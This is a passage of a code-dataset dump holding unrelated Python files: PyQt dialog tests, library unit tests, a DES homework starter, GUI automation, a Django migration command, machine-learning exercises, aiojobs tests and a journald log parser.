self.ctrl.getObj(modifiedOnly=modifiedOnly)\n\t\t\n\tdef getDict(self,modifiedOnly):\n\t\treturn self.ctrl.getDict(modifiedOnly=modifiedOnly)\n\n\tdef ondddEnableChanged(self, obj, value):\n\t\tif str(obj)=='bbb':\n\t\t\tself.ctrl.setValueEnabled('ddd',True)\n\t\tprint('{0}选择框改变了:{1}'.format(str(obj),value))\n\n\tdef ondddChanged(self, obj, value):\n\t\tprint('{0}的值改变了:{1}'.format(str(obj),value))\n\ndef show(filename):\n\tapp = PyQt5.QtWidgets.QApplication(sys.argv)\n\tm = metaData.load(filename)\t\n\td = editDlg({},m) \n\td.show() \n\tsys.exit(app.exec_())\n\n########### unit test ###########\ndef test():\n\ta = scramble\n\tm = metaData(dict,\"测试对话框\")\n\tm.addInt(\"字段int\",\"aaa\",min=10,max=20,isCheckble=True)\n\tm.addText(\"字段text\",\"bbb\",maxSize=12,isCheckble=True)\n\t#m.addNewLine()\n\ta= m.addFloat(\"字段float\",\"ddd\",isCheckble=True)\n\ta.tooltip = \"字段fffffffffloooooooat\"\n\tm2 = m.addSelect(\"字段select\",\"eee\",[(0,\"item0\"),(1,\"item1\"),(2,\"item2\"),(4,\"item4\")])\n\tm2._defaultValue=2\n\t\n\tm.addGroup(\"test2\")\n\tm.addBool(\"字段bool\",\"cccbb\",falseText=\"禁用\",trueText=\"启用\")\n\tm.addGroup(\"test1\")\n\tm.addPwd(\"字段pwd\",\"ccc\")\n\tm.setPrimary(\"aaa\")\n\tm.save(\"test/testmeta.json\")\n\t\n\tvv = {'aaa': 12, 'bbb': '13', \n\t\t 'ccc': '2f71758b439918d452c641d9236ffd61', \n\t\t 'ddd': 16.0, 'eee': 1, 'cccbb': True}\n\t\n\tapp = PyQt5.QtWidgets.QApplication(sys.argv)\n\tm2 = metaData.load(\"test/testmeta.json\")\t\n\td = editDlg({},m2) \n\td.setValue(vv)\n\td.show() \n\tapp.exec_()\n\tprint(\"modified:\",d.getDict(True))\n\tsys.exit()\n\t\nif __name__ == '__main__': \n\t# show(\"./area_meta.json\")\n\ttest()\n\t\n\t\n\t\n\t\n\t\n\t\n\t","sub_path":"akmAOI/common/ui/meta.py","file_name":"meta.py","file_ext":"py","file_size_in_byte":21818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"107398622","text":"# external\nimport pytest\n\n# project\nimport deal\n\n# app\nfrom .helpers import run_sync\n\n\ndef test_silent_contract_not_allow_print():\n @deal.silent\n def func(msg):\n if msg:\n print(msg)\n\n func(None)\n with pytest.raises(deal.SilentContractError):\n func('bad')\n\n\ndef test_decorating_async_function():\n @deal.silent\n async def func(msg):\n if msg:\n print(msg)\n return msg\n\n assert run_sync(func('')) == ''\n with pytest.raises(deal.SilentContractError):\n run_sync(func('a'))\n\n\ndef test_decorating_generator():\n @deal.silent\n def func(msg):\n if msg:\n print(msg)\n yield msg\n\n assert list(func('')) == ['']\n with pytest.raises(deal.SilentContractError):\n list(func('a'))\n","sub_path":"tests/test_decorators/test_silent.py","file_name":"test_silent.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"59806279","text":"#!/usr/bin/env python\n\n### hw2_starter.py\n\nimport sys\nfrom BitVector import *\n\n\nexpansion_permutation = [31, 0, 1, 2, 3, 4, 3, 4, 5, 6, 7, 8, 7, 8, 9, 10, 11, 12, 11, 12, 13, 14, 15, 16, 15, 16, 17, 18, 19, 20, 19, 20, 21, 22, 23, 24, 23, 24, 25, 26, 27, 28, 27, 28, 29, 30, 31, 0]\n\nkey_permutation_1 = [56,48,40,32,24,16,8,0,57,49,41,33,25,17,\n 9,1,58,50,42,34,26,18,10,2,59,51,43,35,\n 62,54,46,38,30,22,14,6,61,53,45,37,29,21,\n 13,5,60,52,44,36,28,20,12,4,27,19,11,3]\n\nkey_permutation_2 = [13,16,10,23,0,4,2,27,14,5,20,9,22,18,11,\n 3,25,7,15,6,26,19,12,1,40,51,30,36,46,\n 54,29,39,50,44,32,47,43,48,38,55,33,52,\n 45,41,49,35,28,31]\n\nshifts_for_round_key_gen = [1,1,2,2,2,2,2,2,1,2,2,2,2,2,2,1]\n\n\ndef generate_round_keys(encryption_key):\n round_keys = []\n key = encryption_key.deep_copy()\n for round_count in range(16):\n [LKey, RKey] = key.divide_into_two()\n shift = shifts_for_round_key_gen[round_count]\n LKey << shift\n RKey << shift\n key = LKey + RKey\n round_key = key.permute(key_permutation_2)\n round_keys.append(round_key)\n return round_keys\n\n\ndef get_encryption_key():\n key = \"\"\n while True:\n if sys.version_info[0] == 3:\n key = input(\"\\nEnter a string of 8 characters for the key: \")\n else:\n key = raw_input(\"\\nEnter a string of 8 characters for the key: \")\n if len(key) != 8:\n print(\"\\nKey generation needs 8 characters exactly. Try again.\\n\")\n continue\n else:\n break\n key = BitVector(textstring = key)\n key = key.permute(key_permutation_1)\n return key\n\ndef encrypt():\n key = get_encryption_key()\n round_key = generate_round_keys(key)\n bv = BitVector('filename.txt')\n while bv.more_to_read:\n bitvec = bv.read_bits_from_file( 64 )\n if bitvec.getsize() > 0:\n [LE, RE] = bitvec.divide_into_two()\n newRE = RE.permute( expansion_permutation )\n out_xor = newRE.bv_xor( round_key )\n\n '''\n now comes the hard part --- the substition boxes\n\n Let's say after the substitution boxes and another\n permutation (P in Section 3.3.4), the output for RE is\n RE_modified.\n\n When you join the two halves of the bit string\n again, the rule to follow (from Fig. 4 in page 21) is\n either\n\n final_string = RE followed by (RE_modified xored with LE)\n\n or\n\n final_string = LE followed by (LE_modified xored with RE)\n\n depending upon whether you prefer to do the substitutions\n in the right half (as shown in Fig. 4) or in the left\n half.\n\n The important thing to note is that the swap between the\n two halves shown in Fig. 4 is essential to the working\n of the algorithm even in a single-round implementation\n of the cipher, especially if you want to use the same\n algorithm for both encryption and decryption (see Fig.\n 3 page 15). The two rules shown above include this swap.\n '''\n","sub_path":"HW2/hw2_starter.py","file_name":"hw2_starter.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"499008235","text":"from sikuli import *\nimport logging\nimport myTools\nfrom datetime import date\nimport reports_Compare\n\n#---------------------------------------------------#\ndef fSet_BillDate(pMonth):\n#---------------------------------------------------#\n\n if pMonth == 13:\n pMonth = 12 \n\n logging.debug('- change bill date: ' + str(pMonth) + \"/27/\" + Settings.dataYear)\n time.sleep(1)\n\n # make sure timeslips has focus\n myTools.getFocus()\n\n # open revise date\n type(\"b\",KeyModifier.ALT)\n type(\"d\") \n time.sleep(2)\n\n # go to today\n type(\"t\")\n\n #get to 01/01 of current year\n type(Key.HOME,KeyModifier.CTRL) \n\n # get to 01/01 of the data year\n thisYear = date.today().year\n for prevYear in range(int(Settings.dataYear),thisYear):\n type(Key.PAGE_UP,KeyModifier.CTRL) \n time.sleep(1)\n\n # get to 01/27 of the data year\n myTools.pressDOWN(4)\n myTools.pressLEFT(2) \n\n for nextMonth in range(pMonth-1):\n type(Key.PAGE_DOWN) \n time.sleep(1)\n \n type(Key.ENTER)\n time.sleep(1) \n\n#---------------------------------------------------#\ndef fRemove_Sort():\n#---------------------------------------------------#\n\n time.sleep(1)\n logging.debug('- remove sort')\n \n type(Key.F6)\n time.sleep(1)\n\n click(Pattern(\"remove_sort-1.png\").similar(0.80))\n time.sleep(1)\n \n type(Key.F6)\n time.sleep(1)\n\n#---------------------------------------------------#\ndef fPrint_BillRun(pMonth):\n#---------------------------------------------------#\n \n reportName = \"Bill-\" + myTools.padZero(pMonth) + \"-\" + Settings.tsVersion + \".txt\" \n logging.debug('fPrint_BillRun: ' + reportName)\n\n type(\"b\",KeyModifier.CTRL)\n time.sleep(1)\n\n fRemove_Sort()\n myTools.enterSlipFilter(pMonth,\"n\")\n\n # print bills to text\n logging.debug('-- print') \n type(Key.ENTER) \n time.sleep(1)\n\n # fill in path and name; press ENTER\n type(Settings.repFolder + \"\\\\\" + reportName)\n time.sleep(1)\n type(Key.ENTER) \n time.sleep(1)\n\n if exists(\"replace_msg.png\"):\n type(\"y\")\n\n # approve bills\n logging.debug('-- approve') \n wait(Pattern(\"approve_bills-1.png\").targetOffset(-100,-8),FOREVER)\n click(Pattern(\"approve_bills-1.png\").targetOffset(-100,-8))\n type(Key.ENTER)\n time.sleep(3)\n\n if int(Settings.tsVersion) > 2015:\n wait(\"approving_bills.png\",FOREVER) \n while exists(\"approving_bills.png\"):\n logging.debug('--- msg exists')\n time.sleep(2)\n else:\n waitVanish(\"approving_statusbar.png\",FOREVER) \n time.sleep(1)\n\n # compare the report with baseline\n reports_Compare.Compare_OneReport(reportName)\n\n # close report entry / don't save\n logging.debug('-- close report window')\n click(\"report_generate_bills.png\")\n type(Key.F4,KeyModifier.CTRL)\n time.sleep(2)\n type(\"n\") \n time.sleep(1)\n\n#---------------------------------------------------#\ndef fPrint_Bills(pMonth):\n#---------------------------------------------------#\n\n myTools.sectionStartTimeStamp(\"bills\" + str(pMonth))\n logging.debug('Print_Bills: ' + str(pMonth))\n \n fSet_BillDate(pMonth)\n fPrint_BillRun(pMonth)\n myTools.sectionEndTimeStamp()\n","sub_path":"bill_Print.sikuli/bill_Print.py","file_name":"bill_Print.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"273878972","text":"import argparse\nimport sys\nfrom typing import List, Union\n\nimport django\nfrom django.apps import apps\nfrom django.core.management.commands.makemigrations import Command as BaseCommand\n\nfrom django_linear_migrations.apps import MigrationDetails, first_party_app_configs\n\n\nclass Command(BaseCommand):\n help = \"Generate max_migration.txt files for first-party apps.\"\n\n # Checks disabled because the django-linear-migrations' checks would\n # prevent us continuing\n requires_system_checks: Union[bool, List[str]]\n if django.VERSION < (3, 2):\n requires_system_checks = False\n else:\n requires_system_checks = []\n\n def add_arguments(self, parser: argparse.ArgumentParser) -> None:\n parser.add_argument(\n \"args\",\n metavar=\"app_label\",\n nargs=\"*\",\n help=\"Specify the app label(s) to create max migration files for.\",\n )\n parser.add_argument(\n \"--dry-run\",\n action=\"store_true\",\n default=False,\n help=\"Actually create the files.\",\n )\n parser.add_argument(\n \"--recreate\",\n action=\"store_true\",\n default=False,\n help=(\n \"Recreate existing files. By default only non-existing files\"\n + \" will be created.\"\n ),\n )\n\n def handle(\n self, *app_labels: str, dry_run: bool, recreate: bool, **options: object\n ) -> None:\n # Copied check from makemigrations\n labels = set(app_labels)\n has_bad_labels = False\n for app_label in labels:\n try:\n apps.get_app_config(app_label)\n except LookupError as err:\n self.stderr.write(str(err))\n has_bad_labels = True\n if has_bad_labels:\n sys.exit(2)\n\n any_created = False\n for app_config in first_party_app_configs():\n if labels and app_config.label not in labels:\n continue\n\n migration_details = MigrationDetails(app_config.label)\n if not migration_details.has_migrations:\n continue\n\n max_migration_txt = migration_details.dir / \"max_migration.txt\"\n if recreate or not max_migration_txt.exists():\n if not dry_run:\n max_migration_name = max(migration_details.names)\n max_migration_txt.write_text(max_migration_name + \"\\n\")\n self.stdout.write(\n f\"Created max_migration.txt for {app_config.label}.\"\n )\n else:\n self.stdout.write(\n \"Would create max_migration.txt for {}.\".format(\n app_config.label\n )\n )\n any_created = True\n\n if not any_created:\n self.stdout.write(\"No max_migration.txt files need creating.\")\n","sub_path":"src/django_linear_migrations/management/commands/create_max_migration_files.py","file_name":"create_max_migration_files.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"394348609","text":"dictionary = {}\n\nwords_definitions = input().split(\" | \")\nfor word_definition in words_definitions:\n word, definition = word_definition.split(\": \")\n if word not in dictionary:\n dictionary[word] = []\n\n dictionary[word] += [definition]\n\n\nwords = input().split(\" | \")\nfor word in words:\n if word in dictionary:\n print(word)\n print(\" -\" + '\\n -'.join(sorted(dictionary[word], key=lambda x: -len(x))))\n\n\ncommand = input()\nif command == \"List\":\n print(' '.join(sorted(dictionary.keys())))\n","sub_path":"Final Exam Preparation/dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"103320677","text":"import ctypes\n\npasta = input(\"Digite o caminho da pasta a ser ocultada ex (C:\\pasta): \" )\natributo_ocultar = 0x02 # arquivo no formato hexadecimal\n\nretorno = ctypes.windll.kernel32.SetFileAttributesW(\"ocultar.txt\", atributo_ocultar)\n\nif retorno:\n print (\"Arquivo foi ocultado\")\nelse:\n print (\"Arquivo não foi ocultado\")","sub_path":"ocultadordeArquivos/ocultadordeArquivos.py","file_name":"ocultadordeArquivos.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"401349528","text":"class Net(nn.Module):\n def __init__(self, actv, input_feature_num, hidden_unit_nums, output_feature_num):\n super(Net, self).__init__()\n\n # Assign activation function (eval allows us to instantiate object from string)\n self.actv = eval('nn.%s'%actv)\n\n # save the input size for later\n self.input_feature_num = input_feature_num\n\n # Initialize layers of MLP\n self.layers = nn.Sequential()\n\n # Loop over layers and create each one\n for i in range(len(hidden_unit_nums)):\n # assign the current layer output feature numbers from hidden layer list\n next_input_feature_num = hidden_unit_nums[i]\n # use nn.Linear to define the layer\n layer = nn.Linear(input_feature_num, next_input_feature_num)\n # append it to the model with a name\n self.layers.add_module('Linear%d'%i, layer)\n # assign next layer input using current layer output\n input_feature_num = next_input_feature_num\n\n # Create final layer\n self.out = nn.Linear(input_feature_num, output_feature_num)\n\n def forward(self, x):\n # reshape inputs to (batch_size, input_feature_num)\n # just in case the input vector is not 2D, like an image!\n x = x.view(-1, self.input_feature_num)\n # get each layer and run it on previous output and apply the activation function\n for layer in self.layers:\n x = self.actv(layer(x))\n\n # Get outputs\n x = self.out(x)\n\n return x\n\n\ninput = torch.zeros((100, 2))\n## Uncomment below to create network and test it on input\nnet = Net(actv='LeakyReLU(0.1)', input_feature_num = 2,\n hidden_unit_nums = [100, 10, 5], output_feature_num = 1)\ny = net(input)\nprint(f'The output shape is {y.shape} for an input of shape {input.shape}')","sub_path":"tutorials/W1D3_MultiLayerPerceptrons/solutions/W1D3_Tutorial1_Solution_600147c3.py","file_name":"W1D3_Tutorial1_Solution_600147c3.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"138278458","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jun 8 20:41:02 2019\r\n\r\n@author: German\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Apr 17 10:50:19 2019\r\n\r\n@author: German\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport sklearn as skl\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport seaborn as sns\r\nfrom sklearn.svm import SVC\r\nimport pickle\r\nimport torch\r\nfrom torch import nn\r\nfrom sklearn.metrics import confusion_matrix\r\nimport plot_confusion_matrix as pcm\r\n\r\npulsdata = pd.read_csv('./HTRU_2.csv',header=None)\r\n\r\npulsdata.columns = ['Mean of the integrated profile',\r\n 'Standard deviation of the integrated profile',\r\n 'Excess kurtosis of the integrated profile',\r\n 'Skewness of the integrated profile',\r\n 'Mean of the DM-SNR curve',\r\n 'Standard deviation of the DM-SNR curve',\r\n 'Excess kurtosis of the DM-SNR curve',\r\n 'Skewness of the DM-SNR curve','Target']\r\n\r\nprint(pulsdata.head(10))\r\n\r\n\r\npulsdata['Target'].value_counts()\r\n\r\nsns.countplot(x='Target',data=pulsdata)\r\nplt.show()\r\n#Normalize data\r\ncolumns2scale = ['Mean of the integrated profile',\r\n 'Standard deviation of the integrated profile',\r\n 'Excess kurtosis of the integrated profile',\r\n 'Skewness of the integrated profile',\r\n 'Mean of the DM-SNR curve',\r\n 'Standard deviation of the DM-SNR curve',\r\n 'Excess kurtosis of the DM-SNR curve',\r\n 'Skewness of the DM-SNR curve']\r\npulsdata[columns2scale]=pulsdata[columns2scale].apply(lambda x: (x-x.min())/(x.max()-x.min()))\r\n\r\n#Dividir en Train y Test datasets\r\nN=len(pulsdata)\r\nN_train=np.round(0.8*N).astype(np.int32)\r\n\r\nrandomdata=np.random.permutation(len(pulsdata))\r\n\r\ndftrain=pulsdata.iloc[list(randomdata[0:N_train])]\r\nYtrain = dftrain['Target']\r\nXtrain = dftrain.drop('Target',axis=1)\r\n\r\ndftest=pulsdata.iloc[list(randomdata[N_train:-1])]\r\nYtest = dftest['Target']\r\nXtest = dftest.drop('Target',axis=1)\r\n\r\n\r\n#format for neural network\r\nnnXtrain = torch.from_numpy(np.array(Xtrain)).float()\r\n\r\nnnXtest = torch.from_numpy(np.array(Xtest)).float()\r\n \r\nnnYtrain = torch.from_numpy(np.array(Ytrain)).float()\r\nnnYtrain=nnYtrain.unsqueeze(1)\r\nnnYtest = torch.from_numpy(np.array(Ytest)).float()\r\nnnYtest=nnYtest.unsqueeze(1)\r\n\r\n#load neural network model\r\n\r\nneuralnetwork = nn.Sequential(nn.Linear(8,56),\r\n nn.Dropout(0.2),\r\n nn.Linear(56,24),\r\n nn.Linear(24,1),\r\n nn.Sigmoid())\r\n \r\n\r\nnncriterion = nn.BCELoss()\r\n\r\nstate_dict = torch.load('pulsarneuralnetwork.sav')\r\nneuralnetwork.load_state_dict(state_dict)\r\nneuralnetwork.eval()\r\n\r\n#neural network predictions\r\nnn_predictions = neuralnetwork(nnXtest).float()\r\nnn_loss = nncriterion(nn_predictions, nnYtest)\r\nprint(nn_predictions)\r\nprint('The test loss is:',nn_loss)\r\n\r\n#change predictions vector from torch to numpy\r\nnn_predictions = nn_predictions.detach().numpy()\r\n#round probabilities to 0 or 1\r\nnn_roundpredictions = np.round_(nn_predictions,decimals=0)\r\n\r\n#load logistic and SVC model\r\n\r\nSVCmodel = pickle.load(open(\"pulsarSVM.sav\", 'rb'))\r\nlogisticmodel = pickle.load(open(\"pulsarlogreg.sav\", 'rb'))\r\n\r\nSVC_predictions = SVCmodel.predict(Xtest)\r\nlogi_predictions = logisticmodel.predict(Xtest)\r\n\r\n#probabilities (instead of predictions) for precision/recall\r\nSVC_prob = SVCmodel.predict_proba(Xtest)\r\nSVC_prob = SVC_prob[:,1]\r\nlogi_prob = logisticmodel.predict_proba(Xtest)\r\nlogi_prob = logi_prob[:,1]\r\n\r\n\r\n#compare by using confusion matrix for test data\r\nprint('_____________________________________________________________')\r\n\r\nprint('Accuracy on Test set:')\r\nclass_names=['Negativo','Positivo']\r\nplt.rcParams[\"axes.grid\"] = False\r\n\r\n#nn_cfmatrix = confusion_matrix(Ytest, nn_predictions)\r\n#print('Neural network confusion matrix is:',nn_cfmatrix)\r\n\r\n#we'll now check training set accuracy for comparing\r\nnn_trainpredictions = neuralnetwork(nnXtrain).float()\r\n\r\nnn_trainpredictions = nn_trainpredictions.detach().numpy()\r\n#round probabilities to 0 or 1\r\nnn_trainpredictions = np.round_(nn_trainpredictions,decimals=0)\r\n\r\n#calculate training set predictions\r\n\r\nSVC_trainpredictions = SVCmodel.predict(Xtrain)\r\nlogi_trainpredictions = logisticmodel.predict(Xtrain)\r\n\r\nprint('Accuracy on Train set:')\r\n\r\nnn_traincfmatrix = confusion_matrix(Ytrain, nn_trainpredictions)\r\nprint('Neural network confusion matrix is:',nn_traincfmatrix)\r\n\r\n#sns.heatmap(nn_traincfmatrix, annot=True,xticklabels=['Negative','Positive'],\r\n #yticklabels=['Negative','Positive'],\r\n #xlabel='Valor Predicho',ylabel='Valor Real')\r\n\r\nSVC_traincfmatrix = confusion_matrix(Ytrain, SVC_trainpredictions)\r\nprint('SVC confusion matrix is:',SVC_traincfmatrix)\r\n\r\nlogi_traincfmatrix = confusion_matrix(Ytrain, logi_trainpredictions)\r\nprint('Logistic Regression (with RFE) confusion matrix is:',logi_traincfmatrix)\r\n\r\nprint('_____________________________________________________________')\r\n\r\n\r\n#average precision\r\nfrom sklearn.metrics import average_precision_score\r\nnn_avprecision = average_precision_score(Ytest, nn_predictions)\r\nSVC_avprecision = average_precision_score(Ytest, SVC_prob)\r\nlogi_avprecision = average_precision_score(Ytest, logi_predictions)\r\n\r\n\r\nprint('_____________________________________________________________')\r\n\r\nprint('Average Precision Scores on Test set:')\r\n\r\nprint('Neural Network: {0:0.2f}'.format(nn_avprecision))\r\nprint('SVC: {0:0.2f}'.format(SVC_avprecision))\r\nprint('Logistic Regression (with RFE): {0:0.2f}'.format(logi_avprecision))\r\n\r\nprint('_____________________________________________________________')\r\n\r\n#precision-recall curve\r\nfrom sklearn.metrics import precision_recall_curve\r\nfrom sklearn.utils.fixes import signature\r\n\r\n#clear figure\r\nplt.clf()\r\n\r\n\r\nnn_precision, nn_recall, _ = precision_recall_curve(Ytest, nn_predictions)\r\nSVC_precision, SVC_recall, _ = precision_recall_curve(Ytest, SVC_prob)\r\nlogi_precision, logi_recall, _ = precision_recall_curve(Ytest, logi_prob)\r\n\r\nplt.figure(0)\r\nstep_kwargs = ({'step': 'post'}\r\n if 'step' in signature(plt.fill_between).parameters\r\n else {})\r\nplt.step(nn_recall, nn_precision, color='b', alpha=0.2,\r\n where='post')\r\nplt.fill_between(nn_recall, nn_precision, alpha=0.2, color='b', **step_kwargs)\r\nplt.xlabel('Recall')\r\nplt.ylabel('Precision')\r\nplt.ylim([0.0, 1.05])\r\nplt.xlim([0.0, 1.0])\r\nplt.title('Neural Network Model Precision-Recall curve: AP={0:0.2f}'.format(\r\n nn_avprecision))\r\nplt.savefig('neuralnet_precall.png')\r\nplt.show()\r\n\r\n#precision recall for SVC model\r\nplt.figure(1)\r\nstep_kwargs = ({'step': 'post'}\r\n if 'step' in signature(plt.fill_between).parameters\r\n else {})\r\nplt.step(SVC_recall, SVC_precision, color='b', alpha=0.2,\r\n where='post')\r\nplt.fill_between(SVC_recall, SVC_precision, alpha=0.2, color='b', **step_kwargs)\r\n\r\nplt.xlabel('Recall')\r\nplt.ylabel('Precision')\r\nplt.ylim([0.0, 1.05])\r\nplt.xlim([0.0, 1.0])\r\nplt.title('SVC Model Precision-Recall curve: AP={0:0.2f}'.format(\r\n SVC_avprecision))\r\nplt.savefig('SVC_precall.png')\r\nplt.show()\r\n\r\n#precision recall for Logistic Regression model\r\nplt.figure(2)\r\nstep_kwargs = ({'step': 'post'}\r\n if 'step' in signature(plt.fill_between).parameters\r\n else {})\r\nplt.step(logi_recall, logi_precision, color='b', alpha=0.2,\r\n where='post')\r\nplt.fill_between(logi_recall, logi_precision, alpha=0.2, color='b', **step_kwargs)\r\n\r\nplt.xlabel('Recall')\r\nplt.ylabel('Precision')\r\nplt.ylim([0.0, 1.05])\r\nplt.xlim([0.0, 1.0])\r\nplt.title('Logistic Regression Model Precision-Recall curve: AP={0:0.2f}'.format(\r\n logi_avprecision))\r\nplt.savefig('logreg_precall.png')\r\nplt.show()","sub_path":"clasificacion pulsars/hacerprecisionrecall.py","file_name":"hacerprecisionrecall.py","file_ext":"py","file_size_in_byte":7900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"399236089","text":"import asyncio\n\nimport pytest\nfrom aiohttp import web\n\nfrom aiojobs.aiohttp import atomic, get_scheduler, get_scheduler_from_app\nfrom aiojobs.aiohttp import setup as aiojobs_setup\nfrom aiojobs.aiohttp import spawn\n\n\nasync def test_plugin(test_client):\n job = None\n\n async def coro():\n await asyncio.sleep(10)\n\n async def handler(request):\n nonlocal job\n\n job = await spawn(request, coro())\n assert not job.closed\n return web.Response()\n\n app = web.Application()\n app.router.add_get('/', handler)\n aiojobs_setup(app)\n\n client = await test_client(app)\n resp = await client.get('/')\n assert resp.status == 200\n\n assert job.active\n await client.close()\n assert job.closed\n\n\nasync def test_no_setup(test_client):\n async def handler(request):\n with pytest.raises(RuntimeError):\n get_scheduler(request)\n return web.Response()\n\n app = web.Application()\n app.router.add_get('/', handler)\n\n client = await test_client(app)\n resp = await client.get('/')\n assert resp.status == 200\n\n\nasync def test_atomic(test_client):\n @atomic\n async def handler(request):\n await asyncio.sleep(0)\n return web.Response()\n\n app = web.Application()\n app.router.add_get('/', handler)\n aiojobs_setup(app)\n\n client = await test_client(app)\n resp = await client.get('/')\n assert resp.status == 200\n\n scheduler = get_scheduler_from_app(app)\n\n assert scheduler.active_count == 0\n assert scheduler.pending_count == 0\n\n\nasync def test_atomic_from_view(test_client):\n app = web.Application()\n\n class MyView(web.View):\n @atomic\n async def get(self):\n return web.Response()\n\n app.router.add_route(\"*\", \"/\", MyView)\n aiojobs_setup(app)\n\n client = await test_client(app)\n resp = await client.get('/')\n assert resp.status == 200\n\n scheduler = get_scheduler_from_app(app)\n\n assert scheduler.active_count == 0\n assert scheduler.pending_count == 0\n","sub_path":"tests/test_aiohttp.py","file_name":"test_aiohttp.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"346999520","text":"#!/usr/bin/env python3\n\n\"\"\"\nThis serves to extract data from a binary file and print it to the screen.\nThe binary file is expected to be a journald-log.\n\"\"\"\n\nimport struct\nimport sys\nimport argparse\nimport hexdisplay\n\ndef main():\n\n args = parse_args()\n\n data_string = file_to_string(args.infile)\n try:\n file_header = parse_file_header(data_string)\n except NoJournaldFile:\n print('No journald file')\n sys.exit(1)\n\n parse_data(data_string, offset=file_header['header_size'])\n\n sys.exit(0)\n\ndef parse_args():\n parser = argparse.ArgumentParser(description = 'Read journald-logfiles')\n parser.add_argument('infile', help = 'path to logfile')\n return parser.parse_args()\n\ndef file_to_string(filename):\n with open(filename, 'rb') as f:\n data_string = f.read()\n return data_string\n\ndef parse_file_header(data_string):\n file_header_string = ('<'\n + '8s' # signature\n + 'L' # compatibility flags\n + 'L' # incompatibility flags\n + 'B' # file state\n + '7s' # reserved bits\n + '2Q' # file id\n + '2Q' # machine id\n + '2Q' # boot id\n + '2Q' # seqnum id\n + 'Q' # header size\n + 'Q' # arena size\n + 'Q' # data hash table offset\n + 'Q' # data hash table size\n + 'Q' # field hash table offset\n + 'Q' # field hash table size\n + 'Q' # tail object offset\n + 'Q' # n objects\n + 'Q' # n entries\n + 'Q' # tail entry seqnum\n + 'Q' # head entry seqnum\n + 'Q' # entry array offset\n + 'Q' # head entry realtime\n + 'Q' # tail entry realtime\n + 'Q' # tail entry monotonic\n + 'Q' # n data\n + 'Q' # n fields\n + 'Q' # n tags\n + 'Q' # n entry arrays\n )\n\n journald_file_header = struct.unpack_from(file_header_string, data_string,0)\n\n file_header = dict([\n ('magic',journald_file_header[0]),\n ('comp_flags', journald_file_header[1]),\n ('incomp_flags', journald_file_header[2]),\n ('file_state', journald_file_header[3]),\n ('reserved_bits', journald_file_header[4]),\n ('file_id', (journald_file_header[5] << 64 | journald_file_header[6])),\n ('machine_id', (journald_file_header[7] << 64 | journald_file_header[8])),\n ('boot_id', (journald_file_header[9] << 64 | journald_file_header[10])),\n ('seqnum_id', (journald_file_header[11] << 64 | journald_file_header[12])),\n ('header_size', journald_file_header[13]),\n ('arena_size', journald_file_header[14]),\n ('data_hash_table_offset', journald_file_header[15]),\n ('data_hash_table_size', journald_file_header[16]),\n ('field_hash_table_offset', journald_file_header[17]),\n ('field_hash_table_size', journald_file_header[18]),\n ('tail_object_offset', journald_file_header[19]),\n ('n_objects', journald_file_header[20]),\n ('n_entries', journald_file_header[21]),\n ('tail_entry_seqnum', journald_file_header[22]),\n ('head_entry_seqnum', journald_file_header[23]),\n ('entry_array_offset', journald_file_header[24]),\n ('head_entry_realtime', journald_file_header[25]),\n ('tail_entry_realtime', journald_file_header[26]),\n ('tail_entry_monotonic', journald_file_header[27]),\n ('n_data', journald_file_header[28]),\n ('n_fields', journald_file_header[29]),\n ('n_tags', journald_file_header[30]),\n ('n_entry_arrays', journald_file_header[31])])\n\n if file_header['magic'] != b'LPKSHHRH':\n raise NoJournaldFile('This file is not a journald file')\n return file_header\n\ndef parse_data(data_string, offset):\n object_header_parse_string = ('<'\n + 'B' # Type\n + 'B' # Flags\n + '6x' # reserved\n + 'Q' # Size\n )\n\n def unused(data_string, offset):\n return None\n\n def data_hash_table(data_string, offset):\n return None\n\n def field_hash_table(data_string, offset):\n return None\n\n def entry_array(data_string, offset):\n return None\n\n def tag(data_string, offset):\n return None\n\n def field(data_string, offset):\n return None\n\n def data(data_string, offset):\n return None\n\n def entry(data_string, offset):\n entry_offset = offset + object_header_size\n entry_parse_string = ('<'\\\n + 'Q' # seqnum;\n + 'Q' # realtime;\n + 'Q' # monotonic;\n + '2Q' # boot_id;\n + 'Q' # xor_hash;\n )\n log_entry = struct.unpack_from(entry_parse_string, data_string, entry_offset)\n\n entry = {}\n entry['seqnum'] = log_entry[0]\n entry['ts_realtime'] = log_entry[1]\n entry['ts_monotonic'] = log_entry[2]\n entry['boot_id'] = (log_entry[3] << 64 | log_entry[4])\n\n entry_payload_parse_string = ('<'\n + 'Q' # entry_item_offset\n + 'Q' # entry_item_hash\n )\n\n entry_payload_size = struct.calcsize(entry_payload_parse_string)\n\n item_offset = entry_offset + struct.calcsize(entry_parse_string)\n\n payload = {}\n while item_offset < (offset + object_header[2]):\n data_object_offset, data_object_hash = struct.unpack_from(entry_payload_parse_string, data_string, item_offset)\n data_object = dataobject(data_string, data_object_offset)\n if data_object is not None:\n split_objects = data_object.decode(encoding='utf-8').split('=')\n payload[split_objects[0]] = split_objects[1]\n\n item_offset += entry_payload_size\n\n entry['payload'] 